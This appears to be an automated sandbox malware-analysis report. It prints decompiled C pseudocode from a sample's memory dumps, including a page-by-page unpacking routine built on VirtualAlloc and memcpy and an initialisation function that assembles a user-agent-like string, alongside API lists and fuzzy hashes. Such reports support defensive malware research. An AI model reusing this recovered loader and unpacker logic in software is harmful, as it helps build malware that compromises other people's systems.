                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 507476733-0
                                                                                                                                                                                                    • Opcode ID: cd65f87ab9bf50cd8f73a0f82f90a31e060f35a5bb2fa460cd28eb4a1201b595
                                                                                                                                                                                                    • Instruction ID: e38353a3ad875a165c8f223823b54c682ef9c62d8e9d6264c7407e54d096da58
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd65f87ab9bf50cd8f73a0f82f90a31e060f35a5bb2fa460cd28eb4a1201b595
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C11CC72B44355BFF710AB74ED09F6A3BA8EB44350F000515F99AC71C0EAB8F8418751
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 57%
                                                                                                                                                                                                    			E04F64EE5(signed int __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                    				CHAR* _v16;
                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                    				CHAR* _t22;
                                                                                                                                                                                                    				CHAR* _t25;
                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				void* _t31;
                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                    				CHAR* _t36;
                                                                                                                                                                                                    				CHAR* _t42;
                                                                                                                                                                                                    				CHAR* _t43;
                                                                                                                                                                                                    				CHAR* _t44;
                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                    				void* _t51;
                                                                                                                                                                                                    				CHAR* _t54;
                                                                                                                                                                                                    				signed char _t56;
                                                                                                                                                                                                    				intOrPtr _t58;
                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				CHAR* _t65;
                                                                                                                                                                                                    				CHAR* _t66;
                                                                                                                                                                                                    				char* _t67;
                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t61 = __edx;
                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                    				_t21 = E04F654ED();
                                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                                    					_t59 =  *0x4f6d25c; // 0x4000000a
                                                                                                                                                                                                    					_t55 = (_t59 & 0xf0000000) + _t21;
                                                                                                                                                                                                    					 *0x4f6d25c = (_t59 & 0xf0000000) + _t21;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t22 =  *0x4f6d164(0, 2);
                                                                                                                                                                                                    				_v16 = _t22;
                                                                                                                                                                                                    				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                                                                                                                                                                    					_t25 = E04F63496( &_v8,  &_v20); // executed
                                                                                                                                                                                                    					_t54 = _t25;
                                                                                                                                                                                                    					_t26 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    					if( *0x4f6d25c > 5) {
                                                                                                                                                                                                    						_t8 = _t26 + 0x4f6e5cd; // 0x4d283a53
                                                                                                                                                                                                    						_t27 = _t8;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t7 = _t26 + 0x4f6ea15; // 0x44283a44
                                                                                                                                                                                                    						_t27 = _t7;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					E04F661FB(_t27, _t27);
                                                                                                                                                                                                    					_t31 = E04F665B1(_t61,  &_v20,  &_v12); // executed
                                                                                                                                                                                                    					if(_t31 == 0) {
                                                                                                                                                                                                    						CloseHandle(_v20);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t62 = 5;
                                                                                                                                                                                                    					if(_t54 != _t62) {
                                                                                                                                                                                                    						 *0x4f6d270 =  *0x4f6d270 ^ 0x81bbe65d;
                                                                                                                                                                                                    						_t32 = E04F68D59(0x60);
                                                                                                                                                                                                    						 *0x4f6d324 = _t32;
                                                                                                                                                                                                    						__eflags = _t32;
                                                                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                                                                    							_push(8);
                                                                                                                                                                                                    							_pop(0);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							memset(_t32, 0, 0x60);
                                                                                                                                                                                                    							_t49 =  *0x4f6d324; // 0x59295b0
                                                                                                                                                                                                    							_t68 = _t68 + 0xc;
                                                                                                                                                                                                    							__imp__(_t49 + 0x40);
                                                                                                                                                                                                    							_t51 =  *0x4f6d324; // 0x59295b0
                                                                                                                                                                                                    							 *_t51 = 0x4f6e836;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t54 = 0;
                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                    						if(0 == 0) {
                                                                                                                                                                                                    							_t36 = RtlAllocateHeap( *0x4f6d238, 0, 0x43);
                                                                                                                                                                                                    							 *0x4f6d2c4 = _t36;
                                                                                                                                                                                                    							__eflags = _t36;
                                                                                                                                                                                                    							if(_t36 == 0) {
                                                                                                                                                                                                    								_push(8);
                                                                                                                                                                                                    								_pop(0);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t56 =  *0x4f6d25c; // 0x4000000a
                                                                                                                                                                                                    								_t61 = _t56 & 0x000000ff;
                                                                                                                                                                                                    								_t58 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    								_t13 = _t58 + 0x4f6e55a; // 0x697a6f4d
                                                                                                                                                                                                    								_t55 = _t13;
                                                                                                                                                                                                    								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4f6c29f);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t54 = 0;
                                                                                                                                                                                                    							__eflags = 0;
                                                                                                                                                                                                    							if(0 == 0) {
                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                    								E04F65DC6( ~_v8 &  *0x4f6d270, 0x4f6d00c); // executed
                                                                                                                                                                                                    								_t42 = E04F62E55(_t55); // executed
                                                                                                                                                                                                    								_t54 = _t42;
                                                                                                                                                                                                    								__eflags = _t54;
                                                                                                                                                                                                    								if(_t54 != 0) {
                                                                                                                                                                                                    									goto L30;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t43 = E04F65672(_t55); // executed
                                                                                                                                                                                                    								__eflags = _t43;
                                                                                                                                                                                                    								if(_t43 != 0) {
                                                                                                                                                                                                    									__eflags = _v8;
                                                                                                                                                                                                    									_t65 = _v12;
                                                                                                                                                                                                    									if(_v8 != 0) {
                                                                                                                                                                                                    										L29:
                                                                                                                                                                                                    										_t44 = E04F627F7(_t61, _t65, _v8); // executed
                                                                                                                                                                                                    										_t54 = _t44;
                                                                                                                                                                                                    										goto L30;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags = _t65;
                                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                                    										goto L30;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t54 = E04F64A32(__eflags,  &(_t65[4]));
                                                                                                                                                                                                    									__eflags = _t54;
                                                                                                                                                                                                    									if(_t54 == 0) {
                                                                                                                                                                                                    										goto L30;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L29;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t54 = 8;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t66 = _v12;
                                                                                                                                                                                                    						if(_t66 == 0) {
                                                                                                                                                                                                    							L30:
                                                                                                                                                                                                    							if(_v16 == 0 || _v16 == 1) {
                                                                                                                                                                                                    								 *0x4f6d160();
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							goto L34;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t67 =  &(_t66[4]);
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    						} while (E04F666F6(_t62, _t67, 0, 1) == 0x4c7);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L30;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t54 = _t22;
                                                                                                                                                                                                    					L34:
                                                                                                                                                                                                    					return _t54;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}































                                                                                                                                                                                                    0x04f64ee5
                                                                                                                                                                                                    0x04f64ef0
                                                                                                                                                                                                    0x04f64ef3
                                                                                                                                                                                                    0x04f64ef6
                                                                                                                                                                                                    0x04f64ef9
                                                                                                                                                                                                    0x04f64f00
                                                                                                                                                                                                    0x04f64f02
                                                                                                                                                                                                    0x04f64f0e
                                                                                                                                                                                                    0x04f64f10
                                                                                                                                                                                                    0x04f64f10
                                                                                                                                                                                                    0x04f64f19
                                                                                                                                                                                                    0x04f64f1f
                                                                                                                                                                                                    0x04f64f24
                                                                                                                                                                                                    0x04f64f3e
                                                                                                                                                                                                    0x04f64f4a
                                                                                                                                                                                                    0x04f64f4c
                                                                                                                                                                                                    0x04f64f51
                                                                                                                                                                                                    0x04f64f5b
                                                                                                                                                                                                    0x04f64f5b
                                                                                                                                                                                                    0x04f64f53
                                                                                                                                                                                                    0x04f64f53
                                                                                                                                                                                                    0x04f64f53
                                                                                                                                                                                                    0x04f64f53
                                                                                                                                                                                                    0x04f64f62
                                                                                                                                                                                                    0x04f64f6f
                                                                                                                                                                                                    0x04f64f76
                                                                                                                                                                                                    0x04f64f7b
                                                                                                                                                                                                    0x04f64f7b
                                                                                                                                                                                                    0x04f64f83
                                                                                                                                                                                                    0x04f64f86
                                                                                                                                                                                                    0x04f64fac
                                                                                                                                                                                                    0x04f64fb8
                                                                                                                                                                                                    0x04f64fbd
                                                                                                                                                                                                    0x04f64fc2
                                                                                                                                                                                                    0x04f64fc4
                                                                                                                                                                                                    0x04f64ff0
                                                                                                                                                                                                    0x04f64ff2
                                                                                                                                                                                                    0x04f64fc6
                                                                                                                                                                                                    0x04f64fca
                                                                                                                                                                                                    0x04f64fcf
                                                                                                                                                                                                    0x04f64fd4
                                                                                                                                                                                                    0x04f64fdb
                                                                                                                                                                                                    0x04f64fe1
                                                                                                                                                                                                    0x04f64fe6
                                                                                                                                                                                                    0x04f64fec
                                                                                                                                                                                                    0x04f64ff3
                                                                                                                                                                                                    0x04f64ff5
                                                                                                                                                                                                    0x04f64ff7
                                                                                                                                                                                                    0x04f65006
                                                                                                                                                                                                    0x04f6500c
                                                                                                                                                                                                    0x04f65011
                                                                                                                                                                                                    0x04f65013
                                                                                                                                                                                                    0x04f65043
                                                                                                                                                                                                    0x04f65045
                                                                                                                                                                                                    0x04f65015
                                                                                                                                                                                                    0x04f65015
                                                                                                                                                                                                    0x04f6501b
                                                                                                                                                                                                    0x04f65028
                                                                                                                                                                                                    0x04f6502e
                                                                                                                                                                                                    0x04f6502e
                                                                                                                                                                                                    0x04f65036
                                                                                                                                                                                                    0x04f6503f
                                                                                                                                                                                                    0x04f65046
                                                                                                                                                                                                    0x04f65048
                                                                                                                                                                                                    0x04f6504a
                                                                                                                                                                                                    0x04f65051
                                                                                                                                                                                                    0x04f6505e
                                                                                                                                                                                                    0x04f65063
                                                                                                                                                                                                    0x04f65068
                                                                                                                                                                                                    0x04f6506a
                                                                                                                                                                                                    0x04f6506c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6506e
                                                                                                                                                                                                    0x04f65073
                                                                                                                                                                                                    0x04f65075
                                                                                                                                                                                                    0x04f6507c
                                                                                                                                                                                                    0x04f65080
                                                                                                                                                                                                    0x04f65083
                                                                                                                                                                                                    0x04f65098
                                                                                                                                                                                                    0x04f6509c
                                                                                                                                                                                                    0x04f650a1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f650a1
                                                                                                                                                                                                    0x04f65085
                                                                                                                                                                                                    0x04f65087
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f65092
                                                                                                                                                                                                    0x04f65094
                                                                                                                                                                                                    0x04f65096
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f65096
                                                                                                                                                                                                    0x04f65079
                                                                                                                                                                                                    0x04f65079
                                                                                                                                                                                                    0x04f6504a
                                                                                                                                                                                                    0x04f64f88
                                                                                                                                                                                                    0x04f64f88
                                                                                                                                                                                                    0x04f64f8d
                                                                                                                                                                                                    0x04f650a3
                                                                                                                                                                                                    0x04f650a7
                                                                                                                                                                                                    0x04f650af
                                                                                                                                                                                                    0x04f650af
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f650a7
                                                                                                                                                                                                    0x04f64f93
                                                                                                                                                                                                    0x04f64f96
                                                                                                                                                                                                    0x04f64fa0
                                                                                                                                                                                                    0x04f64fa7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f650b7
                                                                                                                                                                                                    0x04f650b7
                                                                                                                                                                                                    0x04f650bb
                                                                                                                                                                                                    0x04f650bf
                                                                                                                                                                                                    0x04f650bf

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 04F654ED: GetModuleHandleA.KERNEL32(4C44544E,00000000,04F64EFE,00000000,00000000), ref: 04F654FC
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04F64F7B
                                                                                                                                                                                                      • Part of subcall function 04F68D59: RtlAllocateHeap.NTDLL(00000000,00000000,04F69099), ref: 04F68D65
                                                                                                                                                                                                    • memset.NTDLL ref: 04F64FCA
                                                                                                                                                                                                    • RtlInitializeCriticalSection.NTDLL(05929570), ref: 04F64FDB
                                                                                                                                                                                                      • Part of subcall function 04F64A32: memset.NTDLL ref: 04F64A47
                                                                                                                                                                                                      • Part of subcall function 04F64A32: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04F64A7B
                                                                                                                                                                                                      • Part of subcall function 04F64A32: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 04F64A86
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04F65006
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 04F65036
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4246211962-0
                                                                                                                                                                                                    • Opcode ID: c4cc6f7248b91919e1e7c78506db043e3f67e98bda11ee0db08434edad164aa9
                                                                                                                                                                                                    • Instruction ID: 976d6bc254ad2f95b371116a80807b9f725e24784740063e78d752f0a22c86a2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4cc6f7248b91919e1e7c78506db043e3f67e98bda11ee0db08434edad164aa9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64519372F41219FBEB21AFA4FC84B6E77A8EB08714F040429E513E7141E678F9028B95
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SysAllocString.OLEAUT32(80000002), ref: 04F664C3
                                                                                                                                                                                                    • SysAllocString.OLEAUT32(04F66843), ref: 04F66507
                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 04F6651B
                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 04F66529
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 344208780-0
                                                                                                                                                                                                    • Opcode ID: 13d834918462e29121b299f540a4121ca7642b8fbcc9f023f9cbef4f6f72cc76
                                                                                                                                                                                                    • Instruction ID: 42e1a7ca948a75e05321b37cb1ba0801b9e4c5f02715f60ab2e49e489b8041a7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13d834918462e29121b299f540a4121ca7642b8fbcc9f023f9cbef4f6f72cc76
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24310C76900249FFDB04DF98D9958AE7BB9EF58300B10842EF916DB250E735EA42CF61
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                    			E0040167E(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                    				unsigned int _v12;
                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                    				intOrPtr _t47;
                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                    				intOrPtr _t66;
                                                                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                    				signed int _t80;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t77 =  *0x404130;
                                                                                                                                                                                                    				_t39 = E00401F20(_t77,  &_v20,  &_v12);
                                                                                                                                                                                                    				_v16 = _t39;
                                                                                                                                                                                                    				if(_t39 == 0) {
                                                                                                                                                                                                    					asm("sbb ebx, ebx");
                                                                                                                                                                                                    					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                                                                                                                                                                                                    					_t78 = _t77 + _v20;
                                                                                                                                                                                                    					_v36 = _t78;
                                                                                                                                                                                                    					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
                                                                                                                                                                                                    					_v24 = _t46;
                                                                                                                                                                                                    					if(_t46 == 0) {
                                                                                                                                                                                                    						_v16 = 8;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t61 = 0;
                                                                                                                                                                                                    						if(_t59 <= 0) {
                                                                                                                                                                                                    							_t47 =  *0x404140;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t66 = _a4;
                                                                                                                                                                                                    							_t50 = _t46 - _t78;
                                                                                                                                                                                                    							_t11 = _t66 + 0x4051a2; // 0x4051a2
                                                                                                                                                                                                    							_v28 = _t50;
                                                                                                                                                                                                    							_v32 = _t50 + _t11;
                                                                                                                                                                                                    							_v8 = _t78;
                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                                    								asm("movsd");
                                                                                                                                                                                                    								_t19 = _t61 + 1; // 0x2
                                                                                                                                                                                                    								_t80 = _t19;
                                                                                                                                                                                                    								E00401531(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
                                                                                                                                                                                                    								_t64 = _v32;
                                                                                                                                                                                                    								_v8 = _v8 + 0x1000;
                                                                                                                                                                                                    								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
                                                                                                                                                                                                    								_t61 = _t80;
                                                                                                                                                                                                    								 *0x404140 = _t47;
                                                                                                                                                                                                    								if(_t61 >= _t59) {
                                                                                                                                                                                                    									break;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t50 = _v28;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if(_t47 != 0x63699bc3) {
                                                                                                                                                                                                    							_v16 = 0xc;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							memcpy(_v36, _v24, _v12);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						VirtualFree(_v24, 0, 0x8000); // executed
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _v16;
                                                                                                                                                                                                    			}























                                                                                                                                                                                                    0x00401685
                                                                                                                                                                                                    0x00401695
                                                                                                                                                                                                    0x0040169a
                                                                                                                                                                                                    0x0040169f
                                                                                                                                                                                                    0x004016b4
                                                                                                                                                                                                    0x004016bb
                                                                                                                                                                                                    0x004016c0
                                                                                                                                                                                                    0x004016d1
                                                                                                                                                                                                    0x004016d4
                                                                                                                                                                                                    0x004016da
                                                                                                                                                                                                    0x004016df
                                                                                                                                                                                                    0x00401789
                                                                                                                                                                                                    0x004016e5
                                                                                                                                                                                                    0x004016e5
                                                                                                                                                                                                    0x004016e9
                                                                                                                                                                                                    0x00401751
                                                                                                                                                                                                    0x004016eb
                                                                                                                                                                                                    0x004016eb
                                                                                                                                                                                                    0x004016ee
                                                                                                                                                                                                    0x004016f0
                                                                                                                                                                                                    0x004016f8
                                                                                                                                                                                                    0x004016fb
                                                                                                                                                                                                    0x004016fe
                                                                                                                                                                                                    0x00401706
                                                                                                                                                                                                    0x0040170e
                                                                                                                                                                                                    0x0040170f
                                                                                                                                                                                                    0x00401710
                                                                                                                                                                                                    0x00401717
                                                                                                                                                                                                    0x00401717
                                                                                                                                                                                                    0x0040172b
                                                                                                                                                                                                    0x00401730
                                                                                                                                                                                                    0x00401739
                                                                                                                                                                                                    0x00401740
                                                                                                                                                                                                    0x00401743
                                                                                                                                                                                                    0x00401745
                                                                                                                                                                                                    0x0040174c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401703
                                                                                                                                                                                                    0x00401703
                                                                                                                                                                                                    0x0040174e
                                                                                                                                                                                                    0x0040175b
                                                                                                                                                                                                    0x00401770
                                                                                                                                                                                                    0x0040175d
                                                                                                                                                                                                    0x00401766
                                                                                                                                                                                                    0x0040176b
                                                                                                                                                                                                    0x00401781
                                                                                                                                                                                                    0x00401781
                                                                                                                                                                                                    0x00401790
                                                                                                                                                                                                    0x00401796

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,00401A05,?,00000000,?,?,?,?,?,?,?,00401A05), ref: 004016D4
                                                                                                                                                                                                    • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,00401A05,00000000), ref: 00401766
                                                                                                                                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,00401A05), ref: 00401781
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.622657691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.622723835.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                                                    • String ID: Dec 20 2020
                                                                                                                                                                                                    • API String ID: 4010158826-3924289079
                                                                                                                                                                                                    • Opcode ID: d6e9c729c9b42dc4a2cb3abb4ddefb5a31ddda40c6b40add7113b87fd2f2f0b6
                                                                                                                                                                                                    • Instruction ID: 83a5e2ccf9928f9c5d565479e6d7d5f7868e69ab5e56e13fbed6b73d12f4ef7c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6e9c729c9b42dc4a2cb3abb4ddefb5a31ddda40c6b40add7113b87fd2f2f0b6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4319475D0020AAFCF00CF99D880AEEBBB9FF48304F108179E905BB294D774AA058B94
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                                                                    			E04F63231(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                    				intOrPtr* _t32;
                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                    				int _t46;
                                                                                                                                                                                                    				intOrPtr* _t47;
                                                                                                                                                                                                    				int _t48;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t47 = __eax;
                                                                                                                                                                                                    				_push( &_v12);
                                                                                                                                                                                                    				_push(__eax);
                                                                                                                                                                                                    				_t39 = 0;
                                                                                                                                                                                                    				_t46 = 0; // executed
                                                                                                                                                                                                    				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                                                                                                    				_v8 = _t26;
                                                                                                                                                                                                    				if(_t26 < 0) {
                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_v12 == 0) {
                                                                                                                                                                                                    					Sleep(0xc8);
                                                                                                                                                                                                    					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_v8 >= _t39) {
                                                                                                                                                                                                    					_t28 = _v12;
                                                                                                                                                                                                    					if(_t28 != 0) {
                                                                                                                                                                                                    						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                                                                                                                                                                    						_v8 = _t31;
                                                                                                                                                                                                    						if(_t31 >= 0) {
                                                                                                                                                                                                    							_t46 = lstrlenW(_v16);
                                                                                                                                                                                                    							if(_t46 != 0) {
                                                                                                                                                                                                    								_t46 = _t46 + 1;
                                                                                                                                                                                                    								_t48 = _t46 + _t46;
                                                                                                                                                                                                    								_t39 = E04F68D59(_t48);
                                                                                                                                                                                                    								if(_t39 == 0) {
                                                                                                                                                                                                    									_v8 = 0x8007000e;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									memcpy(_t39, _v16, _t48);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								__imp__#6(_v16);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t32 = _v12;
                                                                                                                                                                                                    						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *_a4 = _t39;
                                                                                                                                                                                                    					 *_a8 = _t46 + _t46;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L13;
                                                                                                                                                                                                    			}














                                                                                                                                                                                                    0x04f6323d
                                                                                                                                                                                                    0x04f63241
                                                                                                                                                                                                    0x04f63242
                                                                                                                                                                                                    0x04f63243
                                                                                                                                                                                                    0x04f63245
                                                                                                                                                                                                    0x04f63247
                                                                                                                                                                                                    0x04f6324a
                                                                                                                                                                                                    0x04f6324f
                                                                                                                                                                                                    0x04f632e6
                                                                                                                                                                                                    0x04f632ed
                                                                                                                                                                                                    0x04f632ed
                                                                                                                                                                                                    0x04f63258
                                                                                                                                                                                                    0x04f6325f
                                                                                                                                                                                                    0x04f6326f
                                                                                                                                                                                                    0x04f6326f
                                                                                                                                                                                                    0x04f63275
                                                                                                                                                                                                    0x04f63277
                                                                                                                                                                                                    0x04f6327c
                                                                                                                                                                                                    0x04f63285
                                                                                                                                                                                                    0x04f6328b
                                                                                                                                                                                                    0x04f63290
                                                                                                                                                                                                    0x04f6329b
                                                                                                                                                                                                    0x04f6329f
                                                                                                                                                                                                    0x04f632a1
                                                                                                                                                                                                    0x04f632a2
